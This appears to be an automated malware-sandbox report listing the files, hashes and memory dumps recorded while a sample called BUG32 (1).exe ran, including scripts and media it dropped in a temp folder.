C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1024B

MD5
94d4163dfa0db5a1a9c23e5e75294948

SHA1
901d33ccb2c2f8fc49125a4c0992649000effda1

SHA256
041fc2b0f85603f210872f1c65a0fa2e0ce007ed76453aba887a5ebe7f7e93e8

SHA512
aaa3a145b33349b23b408065d60e3ba93f55ef149247b01d03d858849865712a2aaf15495435d99233bf91d2342f340878c95eb401f0b2bf360e64a56ac0aa02

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
cabe5bd965b427963f55000f68451f02

SHA1
ead37707dd30562d18a048cc601e315766b1942f

SHA256
4f7bf538d56bd11599bd24eef6c99cb62d13323df1b941fa46faf4bf966fb222

SHA512
0098af5b577ce5be4fa3282269e31be7871cc27b25fbd711ce221a75cbbcd9695db68451004561829db57af33b398f82990c92723571e8650a3b843077a13e8f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
3e1b453545d6b110ce4864dd1203045f

SHA1
ed71a6784e8ea968e19a28d0241d27c32509983c

SHA256
550dc9090aa3483ee9d28ee70aa95d80b98c866f9335421c8423c55e39f2bc74

SHA512
c0af8ca0a0164bb05505291be3b336a65b9cf53f037e34544e2d6384eb1263ed61523f4a5f8acebd308c333b8c715e04c7acb5da81f213f60c7a076aa0f95962

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e7bc99a69d420cbf1721f4c30a5bf070

SHA1
e252a272d9d392de2e784c0d347ac05e5a152a6f

SHA256
c01e2ae6c2629d8bed690802eaf58a74abc299cfbae18ea6b274f96023c093f2

SHA512
2b6051cf415bf209e00f029922e042313446c6dd19edf8f280d9dac12f12aeba7c1bf9920420b43035a9cd74979367704710ea0a5cc394530cc032ea3bfea70d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
2498cf47cb1eb7bc671130004abe0f7e

SHA1
615bfe4ab0cb85378702feb8a6d3edae08259f1a

SHA256
d9f11f5dc9b467427fffc239b67713feb14047453c73723ed3f8d19bef289043

SHA512
948b64cdffd851c7f62b430ac9a523e54f3052c576a4de07923f5428aca09427d5e20baaf9b6144c5ae711576bf1ccc517be9c7d4d4928cd7d3149709286a355

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
ab4a5c9638b880546154ed75bb781b7b

SHA1
d1dbbdaeb99d2eb9b7333f95ca76518a27a22a87

SHA256
6a3ee6408e8e3bbfb40f248b89f80b8ef94150ccdf7537c3f8d0a6df305bb32d

SHA512
14cd4758ffcaa55559592632087081bef7798981178326a02ecc188baebd2ef46d2af2ab4c23a8b4f226a7d45eaa2c882bfbc17a4902242a94cbf5d24ec49e66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
f31749547ce6e8e86b8b7c39f98150c9

SHA1
22c9b90b2a124fcb1fc671c9a8205974c7334504

SHA256
a6a4caaefb7632b4d97d1f83d402be0fb6ce3be47731777a03e7b2a375d6f5b3

SHA512
c9a79ec18c7137a0f5aad075c8982d7f495d10245006a31d9b8cc0fb20ce9b9a58b38ae2eb93e718091793653e01efe5c2ce9b82eb8de8271609921716fc518e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe580337.TMP

Filesize
1KB

MD5
eb0edac52abdc60d43761edbc8577fe8

SHA1
3ba4c3f7f3f3e0067d85d986ef3a2c7091325a1e

SHA256
4f3bd229f6844a2a1efd01aae9c86eb26fe982cd73a8ab743906f23385cfbec5

SHA512
401fde85e3b6c0641c05a3981cb1f4802c67646a2e82e531e99af28cd9b00143c6f1b3f86f8035db15bfb8d5bc55728c12662b240e4fb855027c173841a6e1c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
d08b6de58bf6525d8e606d4d0cfe86cb

SHA1
6d1de6ef08681a9227f0445dd705b1a13488f7e9

SHA256
9c70489b01266afeb6c675680882439c293d2d4b8503ad9af9302ef50b8f53a1

SHA512
fad07c04d7f5a6c79694642fdee5fc28f70c014c3856475b2e842ffa68c1b26d8a91d942f388231e5c71af2c1aee74f110f280f1d83253fce9ecc98a1144e10f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
30bd5e86b9c61479de876db779007cfb

SHA1
b2d7448275daf423b10d41464bf3e448d3e51c70

SHA256
979108b561114cd9d5af02ca20e27df937d966ce02ca0afe056a19e750b90f84

SHA512
c5b2a10914f3d24d34e765e97066935d9126451895f9d6c1fd52164ffcb935be1090ee53831a3cf61397d1e67f3ebd559da220490ffebc48943e14039fda1967

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

Filesize
384KB

MD5
9b39c8547503a0fdecd29c6ee70cef52

SHA1
e7449059220cd65a69f5002bb6ef24aca23e9d8b

SHA256
4ee3ec0ebaa01d5d91d526b47b550218816424b6c854e4efcd9284a769ef271a

SHA512
c280f5c0fbf1bc423e1c5885f5a04d38393148487016f34c1ad8a051131ed763892ec6e3ef530e6bf037f9253a2833ea3910f6df3f4bc0d6b1d35c8fe4b117ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

Filesize
1024KB

MD5
137f490e722727813daa1623be5c8fe5

SHA1
91289a4c424fe0c83abbff55e58f5d1759bc4d6d

SHA256
e5e97589f7fb4fafbe1990dd5d1d23cb2da27fc3aa950f021738c7130f07378f

SHA512
65ff88a38b112d745d73b8a156a48b9bc2f036d94d693a0c3d016617d7df7ab1097460549477dac9e7823976c4ba5d6b09117cfe2e8334fbca3048a7aae6dce7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb

Filesize
68KB

MD5
2b7bef8adaf178cc7f5777151f925bd8

SHA1
bf2b03b9369a645be00f9ecdb795e596951d72c0

SHA256
3ea0af541a731bb50278a2dd8d9ce74559192cccc0f07e931b5ceb5dc2762ad8

SHA512
1562b5978c660f2b3047b5f5527a50bf3848bb308e6d6fe7451cd8e89d0e603c9a7ab5b1d793afae95633b8cc6ad4ca3d52644291c5d85fe89484fdbe4878e30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD

Filesize
498B

MD5
90be2701c8112bebc6bd58a7de19846e

SHA1
a95be407036982392e2e684fb9ff6602ecad6f1e

SHA256
644fbcdc20086e16d57f31c5bad98be68d02b1c061938d2f5f91cbe88c871fbf

SHA512
d618b473b68b48d746c912ac5fc06c73b047bd35a44a6efc7a859fe1162d68015cf69da41a5db504dcbc4928e360c095b32a3b7792fcc6a38072e1ebd12e7cbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

Filesize
9KB

MD5
5433eab10c6b5c6d55b7cbd302426a39

SHA1
c5b1604b3350dab290d081eecd5389a895c58de5

SHA256
23dbf7014e99e93af5f2760f18ee1370274f06a453145c8d539b66d798dad131

SHA512
207b40d6bec65ab147f963a5f42263ae5bf39857987b439a4fa1647bf9b40e99cdc43ff68b7e2463aa9a948284126ac3c9c7af8350c91134b36d8b1a9c61fd34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak

Filesize
9KB

MD5
7050d5ae8acfbe560fa11073fef8185d

SHA1
5bc38e77ff06785fe0aec5a345c4ccd15752560e

SHA256
cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

SHA512
a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

Download Submit
C:\Users\Admin\AppData\Local\Temp\B3EA.tmp\B3EB.vbs

Filesize
513B

MD5
739efd2b7b9737d3d191e9fc5b983824

SHA1
6ad90c8406ae243fbb5ce07172447879205b525c

SHA256
1b51ef43c6e66683199c084b53b5b13d39a02ea6a94ca5f7293c7d68ba362583

SHA512
7fa6ead55103ccf506192643ce608b84969a8bda28c7bc2855907d14b6e756574258924766920ea661d68507fca772a12a652aab7c85466e0d97a444098cf59c

Download Submit
C:\Users\Admin\AppData\Local\Temp\B3EA.tmp\BUG32\ad.exe

Filesize
21KB

MD5
7999f942ff7190cb7c9f0e04d6dc3d41

SHA1
66c3743d7a3d0885a624600abd71486c63a52904

SHA256
8c52ba6df441fea41e87285a7a79e790773407b4d377730b4f834b067d355776

SHA512
9ea2f9e0e81b69895023da6a5e6f4850bdfb0e37d847a6086afaa3debb928673276fa149b2e8df154f6b0498191e5e7ab29c22bc415a761038435abcc4607cee

Download Submit
C:\Users\Admin\AppData\Local\Temp\B3EA.tmp\BUG32\admin.vbs

Filesize
182B

MD5
052bc547687f4b9136a4d21ccb9be339

SHA1
897dfc37a8d89c9fbe390f9663495a2940457100

SHA256
2b1c03ec095baa8004183d2d9dc2a42d012c22969ee9923215cf73982e4bb122

SHA512
85e9a4092ed12d426fc5903c4f576b0085b3e794060382a87b8c8c871139a7968dd43b797088e303f4583374551102e4dc064b9b1e8af4fe89ab20799a981a31

Download Submit
C:\Users\Admin\AppData\Local\Temp\B3EA.tmp\BUG32\bx.cur

Filesize
2KB

MD5
664a5626d7f9f5b991976b7c2fcd6176

SHA1
cafdd6179df723c7a7dcfa96a774fd2dc92ef40f

SHA256
691bbbad6b1d9b7c010cf63976e55e9c2b06ec0e9b29a7f16d8cf3b28e408cf8

SHA512
d4f1eb1dac1404219915f882aeac2544f82465d8bf84d9af0e03fa671a4f0798ca42fcd801cce9715c05a06732a03ec31189943a4a001137f3a022a4b89991b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\B3EA.tmp\BUG32\emptyone.vbs

Filesize
29B

MD5
9dbbdc7d01ea45c41f089d9c345b8100

SHA1
c0d429a5e3a6e729583e6bcf0599a62466ccfbe2

SHA256
9a3cfe496cf2c6b1efcba29320353194b3974ebeb49cadcbf83a72745c50fef6

SHA512
530e8dbe050c7a073ff0efbf6e117f6bf86ad856ec43b8a7faefc495f603503a6e18994d8cb778f66ad1077904f64c7189b5a2c10c8899ebb6dcaaf5c4f3461e

Download Submit
C:\Users\Admin\AppData\Local\Temp\B3EA.tmp\BUG32\evl.wav

Filesize
1.5MB

MD5
fae94d96ac61b8d57365151e142ed9f4

SHA1
bf9b9be54dcdadc9d8cdf427c16dc5ca9c8c28a8

SHA256
86f9017cf6f3c95a43922e5e5c58d71cbc82064a78895b531d1f5aa368ea5b63

SHA512
7b0d7026017dea8aa70975c023160e340cac7474bae5beedfb906f7378d033bb67c44b1c7085ac34ef061008ecd0cf545449e1da624c1408cda1e649ab1ca49d

Download Submit
C:\Users\Admin\AppData\Local\Temp\B3EA.tmp\BUG32\icon.ico

Filesize
16KB

MD5
e22ab01202357460eec9871c74e6212b

SHA1
d16c867a6a32769b1cdab2ce2e37d4d7d48570b7

SHA256
1bd0dbdbe78d8218968cf3d5f203abf52824870a39610c505e8fba695fd329bb

SHA512
9535ad5c9d4b94ec525ab643e4f0ff37868465ae892f16c3465a5c0fc49a0bdb2075053bf1948502902e04996ef7dd3b8fa7dc6b9be4cb756ddfbd76544eb507

Download Submit
C:\Users\Admin\AppData\Local\Temp\B3EA.tmp\BUG32\jaq.vbs

Filesize
4KB

MD5
e77aad670e295b9849a0d3d4f8501ec2

SHA1
0f0061209c15a0184bacfe87ff67c80a7283ded5

SHA256
c1ffac115387d943660d11acea27a06a920f505a0f3142969c25c9fa2e830b6f

SHA512
d2e9144a666600d407922a968ca8705f286d9b52ff43873a96a61fb39c63e11ad5d67e405cd5a95659d6309fc729b67269d19d405a9a2c9c8e18c2863515b760

Download Submit
C:\Users\Admin\AppData\Local\Temp\B3EA.tmp\BUG32\js.bat

Filesize
50B

MD5
faf4749b646b63a1df551fe0141727cb

SHA1
eab00a1525581a6823d7216f3ec019012bab619f

SHA256
6b2831b0c5bcac2f5f57aab8028cd486f4c6c26364a70ecc76ff71d7f710049c

SHA512
28eea78034e7b6d09a32d9985d2731ec582c232425ee4d81a52d65aa5f3618f8d463c52caa881496116c47433140e7b1c79dc6add6b88ef2650ac7ae8cbfb67a

Download Submit
C:\Users\Admin\AppData\Local\Temp\B3EA.tmp\BUG32\jsc.exe

Filesize
200KB

MD5
367b7179319f010f84b37acfc65082ba

SHA1
3c74537066cc79cf1505e9c79fe321b53ed3ab16

SHA256
035cc52a0abb363a463e21787dc061a3b42376ba0b082bc9c2d7e2399365862f

SHA512
d282fac9692b3ff1ab838b1a9a30727f7e166f92923503c65bca3bef85e75b300a1973d6fc1739f04f4058e743abdec29a08ecf1bda4730a02dcdaeb13749833

Download Submit
C:\Users\Admin\AppData\Local\Temp\B3EA.tmp\BUG32\kill.bat

Filesize
398B

MD5
9e116f6eb010b8bff3211210e5b979fe

SHA1
d81b32e7845a614a38e3902239ce978c908af8c2

SHA256
cdeabd549e74e525e1baad3252246209667967399563f8be2b3275c8c276fc3e

SHA512
fd5687206d013577577d68c65215cd4636a616b83e12e5acbae0b619e543ff06f67d3881c8c85d0e6e0ee13dd7f5e20246b9edafea26cb0d6bb39ee4362966b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\B3EA.tmp\BUG32\msc.wav

Filesize
344KB

MD5
77bb6c1e12d47eff938d2efb28e7fb9d

SHA1
7f4fc62fde5eb3beb6def399ab525380cc4b8965

SHA256
926e24d85e847789a62f8ae3dae7af494ff329893a9a3c133b073b4b9cddbccb

SHA512
a19afaa90822b0081d51612aea2a41992f5c4eb2f39767cf9ed96b1ffc88bbb4203b4a04e9942c2cef445866817f56802ef099ba4f034949861dd3da6c4b3b2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\B3EA.tmp\BUG32\nokill.bat

Filesize
81B

MD5
00cf4877a187a307971f4fd650ac8c11

SHA1
2569ed07cbe4ab78d12cba571e83e1e1a7fc59b6

SHA256
8fdd9f0aa62b3e365850970187311192f5e101768edad88b550cc39a6909bdce

SHA512
039e90e66ed5fa8cd39a7525d1b7b0eba85b32d4954a41e60a113b61d3e1fda9b2356975a587873ca54cef129a894ac19e2d1c6d59e20a182412861b1205d4b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\B3EA.tmp\BUG32\runner.vbs

Filesize
277B

MD5
fe18d2d82dbfb9226cc424c0164252be

SHA1
e058b9eff08e3a7370d49d78634c8c201db8f0e5

SHA256
7922e452d5166bfa8e32e9392cb3b123cffc54b03218d8fcb584f5a2d97a0b96

SHA512
6540372f658f6397eb836d979b4208c6507b4aafdb8eacce772d645cdc1f418690e50c275c0a71c305f0a9201688bbe955fb5023aff223f18c0e83e32735c996

Download Submit
C:\Users\Admin\AppData\Local\Temp\B3EA.tmp\BUG32\scrm.wav

Filesize
880KB

MD5
95aa92415c37bbf7e649d406f159853d

SHA1
ff37bc8b297a81e78d31e27559a9c4e1e1307275

SHA256
b9d6d86686222addc0048bdb7be1e5531a1d4b48d8d65e156e180e94035c3d02

SHA512
6efa300352e64da46d343dad5ef2d810c7ee0b07dc9b7b1b8968ef9c8a4446ed4a17064194dfc44fbe16c95972e4866eb1042e34a2528b782f0ba0ee582fafed

Download Submit
C:\Users\Admin\AppData\Local\Temp\B3EA.tmp\BUG32\whitescr.png

Filesize
52KB

MD5
19d522cd15cc73b932f1ab4252d9d624

SHA1
27c0f04a38af403f84e1f2dc6965206e8b3f9b73

SHA256
78c21952f543624fe51f92bc2f35b17f652e4fed695228aa530370ff05083a04

SHA512
8c43e39a8affc34743b4e1521f85f578ea2b3b6f455d20983746ec4eb1f28f6f706889ba3ed1551b9a14ab3dc9723e719a48077de9fbd06dd77ee0f41b064a9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\wmsetup.log

Filesize
1KB

MD5
17bcf2dbb69851822cf76fb0002953dc

SHA1
946b2f7bdbd8d00475fdec351a4c226ce0b2d58d

SHA256
9c631fd93f5eeb84651e95a5e9a3e93b7da8c96cae8d9f220ff0d0e022535ab1

SHA512
8570d96a21a16b33256cfa66df377ebb77c5d142f61aad42d923449b87cfa792761417130479c4f130341ddaf98423f15bcdffd8db61d2b0d6aab7be534e3e19

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\74d7f43c1561fc1e.customDestinations-ms

Filesize
1KB

MD5
bcc353a928baa85444b180148e3e44d1

SHA1
d97dec62424d4345f8c6e2c680b77f3992116336

SHA256
abaf809572e3dbb92515c9fbe24f976e2e75d1f2d47f1f5edb956217e416cb9f

SHA512
cd41e8a98b9f97e4c45e5a144db9472f1df674884483836d95c2e9fcecfbda64ffff53d4526df5d54f86c7d62e508e588b2b9dcaf41843fb01bebdbf61fd418e

Download Submit
C:\Users\Admin\Downloads\BUG32 (1).exe:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\bug32\list.lnk

Filesize
131KB

MD5
0bb97e0266dadb24b36077be2c722402

SHA1
26eaf860265435f592f90f578114fc642a4de910

SHA256
375a3cc775cfa8bf39e3aabbbe1e1f36819526ee8710ac9cbbb599a1e0c85676

SHA512
79ddbe9625d2da31d0d451081a7a8b8fd5664e9af05b0292e2350b006b851a7d6022d275d1f11eb9e0ba4bc2fab43eef179c8693dd918a484588f04ebc5524ea

Download Submit
\??\pipe\LOCAL\crashpad_4756_QEFJEUWQXVKVSJAM

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/3152-2275-0x00000000002A0000-0x00000000002AC000-memory.dmp

Filesize
48KB

Download
memory/3152-2278-0x00000000052F0000-0x0000000005896000-memory.dmp

Filesize
5.6MB

Download
memory/3152-2279-0x0000000004DE0000-0x0000000004E72000-memory.dmp

Filesize
584KB

Download
memory/3152-2280-0x0000000004D50000-0x0000000004D5A000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads